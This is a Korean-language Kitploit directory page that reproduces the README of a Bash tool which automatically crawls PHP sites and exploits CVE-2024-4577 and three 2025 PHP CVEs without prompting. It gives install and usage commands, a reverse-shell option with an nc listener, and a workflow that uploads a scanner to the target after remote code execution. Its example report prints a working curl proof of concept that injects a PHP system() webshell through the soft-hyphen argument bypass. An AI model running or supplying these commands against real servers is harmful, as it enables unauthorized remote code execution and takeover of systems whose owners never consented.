Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PHP_8.1.x_Exploit — 심각한 PHP 취약점의 자동 탐지 및 악용 (CVE-2024-4577 우회, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
도구/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconnaissanceVulnerability ScannersPayload GenerationExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlCrawlerRemote Access Tool
GitHubgl1tch0x1/php_8.1.x_exploit
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PHP_8.1.x_Exploit

심각한 PHP 취약점의 자동 탐지 및 악용 (CVE-2024-4577 우회, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

저장소 보기

🚀 PHP CVE Autopilot

취약한 PHP CVE(CVE-2024-4577 우회, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) 자동 탐지 및 익스플로잇

License: GPL v3 Bash

PHP8.1.x_Exploit.sh는 단일 파일, 설정 불필요 보안 평가 도구로, 2024년 12월에 출시된 PHP 8.1.34 이전 버전에 영향을 미치는 4가지 고영향 CVE를 자동으로 발견하고 익스플로잇합니다. 수동 페이로드 제작이 필요 없습니다. URL만 제공하면 스크립트가 크롤링부터 원격 코드 실행까지 모든 작업을 수행합니다. 완전 자동 조종(Autopilot) – 사용자 프롬프트 없이 자동 탐지 및 익스플로잇합니다.

기능

  • 완전 자율 자동 조종 – 단일 URL만 주어지면 사용자 상호작용 없이 크롤링, 핑거프린팅, 테스트 및 익스플로잇을 수행합니다.
  • 배치 스캔 – 대상 목록을 제공하고 병렬로 실행합니다.
  • 고급 크롤링 – 홈페이지에서 링크와 양식을 추출하여 더 나은 검색을 지원합니다.
  • OS 및 PHP 버전 핑거프린팅 – Linux에서 Windows 전용 공격을 방지하고 PHP 버전을 확인합니다.
  • CVE-2024-4577 우회 (Windows CGI 인수 주입)
    • 취약한 PHP-CGI 엔드포인트를 탐지하고 익스플로잇합니다.
    • 선택적 리버스 셸(PowerShell 원라이너).
    • 두 가지 주입 방식: 표준 -d 및 소프트 하이픈 %AD 우회.
  • CVE-2025-14177 – getimagesize()를 통한 힙 메모리 누수
    • 변조된 JPEG를 동적으로 생성하여 발견된 모든 업로드 엔드포인트에 자동으로 제출합니다.
    • 응답에서 누출된 메모리를 탐지합니다.
  • RCE를 통한 심층 로컬 스캔 (CVE-2024-4577이 익스플로잇된 경우)
    • 다음을 테스트하는 경량 PHP 스캐너를 업로드합니다:
      • CVE-2025-14180 – PDO PostgreSQL의 NULL 포인터 역참조.
      • CVE-2025-14178 – array_merge의 정수 오버플로.
  • 스마트 크롤링 – CGI 스크립트 및 업로드 페이지를 발견하기 위해 링크와 양식을 추출합니다.
  • 병렬 실행 – parallel이 있으면 사용하고, 없으면 우아하게 대체됩니다.
  • 상세 및 디버그 모드 – 모든 HTTP 요청과 결정 과정을 확인합니다.
  • 보고서 생성 – 모든 결과를 텍스트 파일로 저장합니다.
  • 깔끔하고 안전함 – 종료 시 임시 파일이 삭제되고, 타임아웃이 걸림을 방지합니다.

요구 사항

루트 권한이 필요하지 않습니다 – 이 도구는 HTTP 요청만 보내고 선택적으로 리버스 셸을 실행합니다(사용자 시스템에 리스너 필요).

설치

root@kitploit:~
git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

사용법

단일 대상 (가장 일반적)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.example.com

리버스 셸과 함께 단일 대상 (CVE-2024-4577)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

사용자 시스템에서 다음을 실행:

root@kitploit:~
nc -lvnp 4444

여러 대상 배치 스캔

root@kitploit:~
./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

targets.txt 예시:

root@kitploit:~
http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

스캔 전용 모드 (익스플로잇 시도 없음)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

결과를 파일로 저장

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

상세 / 디버그 출력

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # 매우 자세함

작동 방식 (단계)

명령줄 옵션 (전체 참조)

상세 CVE 정보

참고: CVE‑2025‑14180 및 CVE‑2025‑14178은 서버 내부에서만 (로컬 테스트) 정확하게 탐지할 수 있습니다. 스크립트는 CGI 익스플로잇 성공 후 스캐너를 업로드하여 이를 달성합니다.

📸 예제 출력

root@kitploit:~
[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ 중요 경고 및 면책 조항

  • 자동 조종 모드 – 이 도구는 프롬프트 없이 자동으로 취약점을 익스플로잇합니다. 승인된 대상에서만 사용하십시오.
  • 법적 용도로만 사용 – 이 도구는 승인된 보안 평가, 침투 테스트 및 교육 목적으로 사용됩니다. 허가 없이 시스템에 대해 사용하는 것은 대부분의 관할권에서 불법입니다.
  • 보증 없음 – 이 소프트웨어는 어떠한 종류의 보증 없이 "있는 그대로" 제공됩니다.
  • 손상 가능성 – 익스플로잇은 서비스를 중단시키거나(CVE-2025-14180) 메모리를 손상시킬 수 있습니다(CVE-2025-14178). 명시적 동의 없이 프로덕션 시스템에서 실행하지 마십시오.
  • 리버스 셸 – --revshell 옵션은 대상에서 사용자 시스템으로 소켓을 엽니다. 다시 연결할 권한이 있는지 확인하십시오.
  • 로깅 – 사용자의 요청은 대상의 액세스/오류 로그에 나타납니다. 책임감 있게 사용하십시오.

🛠️ 문제 해결

🤝 기여

풀 리퀘스트, 버그 리포트 및 기능 제안을 환영합니다. 다음을 따라주십시오:

  • 스크립트를 단일 파일로 유지하고 순수 Bash로 유지하십시오.
  • parallel이 있는 경우와 없는 경우 모두 테스트하십시오.
  • 이 README를 그에 따라 업데이트하십시오.

📜 라이선스

GNU General Public License v3.0 – LICENSE 파일을 참조하십시오.

📚 참고 자료

  • PHP 8.1.34 릴리스 공지
  • CVE-2024-4577 상세 정보 (NVD)
  • CVE-2025-14177 / 14178 / 14180 (NVD)
  • Windows Best-Fit 문자 매핑

보안 커뮤니티를 위해 🧠로 제작되었습니다. 윤리적으로 사용하십시오.

도구 다운로드
종속성용도일반적으로 설치됨?
bash 4.0 이상스크립트 인터프리터예 (Linux/macOS)
curlHTTP 요청예
grep, sed, awk텍스트 처리예
mktemp임시 파일 생성예
(선택) parallel더 빠른 배치 스캔아니오 (하지만 권장)
(선택) jqJSON 출력 포맷팅아니오
단계작업
1핑거프린팅 – 헤더와 프로브에서 OS 및 PHP 버전 식별.
2크롤링 – 홈페이지에서 href 및 action 속성 추출.
3CGI 검색 – 일반적인 경로와 CGI처럼 보이는 크롤링된 링크 시도.
4CVE‑2024‑4577 테스트 – -d 및 %AD 페이로드 모두 주입; 성공 시 명령 실행 또는 리버스 셸 전송.
5업로드 엔드포인트 검색 – 일반적인 업로드 경로 및 "upload"/"image"를 포함하는 모든 양식 확인.
6CVE‑2025‑14177 테스트 – 변조된 JPEG를 생성하여 각 업로드 엔드포인트에 POST하고 힙 누수 탐지.
7심층 내부 스캔 – RCE가 달성되면 스캐너 PHP 스크립트를 업로드하고 실행하여 CVE‑2025‑14180 / CVE‑2025‑14178 테스트.
8보고 – 요약 출력 및 선택적으로 파일에 기록.
옵션설명
-u URL단일 대상 URL (예: http://example.com/)
-l FILE한 줄에 하나의 URL이 있는 배치 파일
--scan-only탐지만 – 익스플로잇하지 않음 (리버스 셸 없음, 페이로드 업로드 없음)
-o FILE최종 보고서를 FILE에 기록
--threads N배치 스캔을 위한 병렬 스레드 수 (기본값: 5)
--timeout NHTTP 타임아웃 (초) (기본값: 10)
--no-color색상 출력 비활성화
--verbose상세 진행 상황 표시
--debug모든 HTTP 요청 표시 (민감한 데이터가 노출될 수 있음)
--revshell IP PORTCVE‑2024‑4577이 발견되면 리버스 셸 시도
-h, --help도움말 표시 및 종료
CVE심각도영향익스플로잇 벡터수정된 버전
CVE‑2024‑4577 (우회)치명적RCEWindows CGI 인수 주입 (소프트 하이픈 매핑)PHP 8.1.34
CVE‑2025‑14177중간/높음정보 누출 (힙 메모리)변조된 JPEG를 getimagesize()에 전달PHP 8.1.34
CVE‑2025‑14180높음DoS (NULL 역참조)에뮬레이트된 프리페어 + 변조된 매개변수 \x99를 사용하는 PDO PostgreSQLPHP 8.1.34
CVE‑2025‑14178높음 (8.2)DoS / 잠재적 메모리 손상거대한 배열로 인한 정수 오버플로를 일으키는 array_merge()PHP 8.1.34
문제해결 방법
curl: command not foundcurl 설치
GNU parallel not found무시 – 스크립트는 없이도 작동함 (배치 스캔 속도 저하)
CGI 엔드포인트를 찾을 수 없음대상이 CGI를 사용하지 않거나 -d 플래그를 차단하는 WAF 뒤에 있을 수 있음
CVE-2024-4577은 작동하지만 리버스 셸이 실패함방화벽을 확인하십시오. --scan-only로 더 간단한 페이로드를 시도하고 수동으로 nc 리스너를 사용하십시오
이미지 누수 테스트가 항상 "No leak" 반환업로드 엔드포인트가 getimagesize()를 사용하지 않거나 바이너리 데이터를 제거할 수 있음
로컬 스캐너 업로드 실패웹 루트에 쓰기 권한이 없을 수 있음. 스크립트는 CGI 스크립트와 동일한 디렉토리에 쓰기를 시도함